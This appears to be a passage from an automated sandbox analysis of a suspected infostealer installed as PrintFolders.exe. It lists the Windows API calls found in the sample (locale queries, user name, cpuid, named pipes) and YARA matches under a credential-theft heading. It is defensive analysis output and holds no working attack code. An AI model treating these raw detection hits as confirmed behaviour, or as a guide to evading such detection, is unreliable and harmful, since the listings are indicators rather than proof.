Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoA, 0_2_00405214
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: GetLocaleInfoA, 1_2_0040874C
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: GetLocaleInfoA, 1_2_00408798
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: GetKeyboardLayoutList,GetLocaleInfoA,__Init_thread_footer, 2_2_00404D40
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: EnumSystemLocalesW, 2_2_00427041
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: EnumSystemLocalesW, 2_2_0042708C
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: EnumSystemLocalesW, 2_2_00427127
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 2_2_004271B2
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: EnumSystemLocalesW, 2_2_0041E2FF
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: GetLocaleInfoW, 2_2_00427405
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 2_2_0042752B
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: GetLocaleInfoW, 2_2_00427631
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 2_2_00427700
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: GetLocaleInfoW, 2_2_0041E821
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 2_2_00426D9F
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_0040F7F3 cpuid 2_2_0040F7F3
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00455B2C GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,6D2B5CA0,SetNamedPipeHandleState,6D747180,CloseHandle,CloseHandle, 1_2_00455B2C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004026C4 GetSystemTime, 0_2_004026C4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00405CB0 GetVersionExA, 0_2_00405CB0
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00453A24 GetUserNameA, 1_2_00453A24

Stealing of Sensitive Information

barindex
Source: Yara match File source: 2.2.PrintFolders.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.PrintFolders.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.PrintFolders.exe.33a0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.PrintFolders.exe.33a0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.325696039.0000000001660000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.326103420.00000000033A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY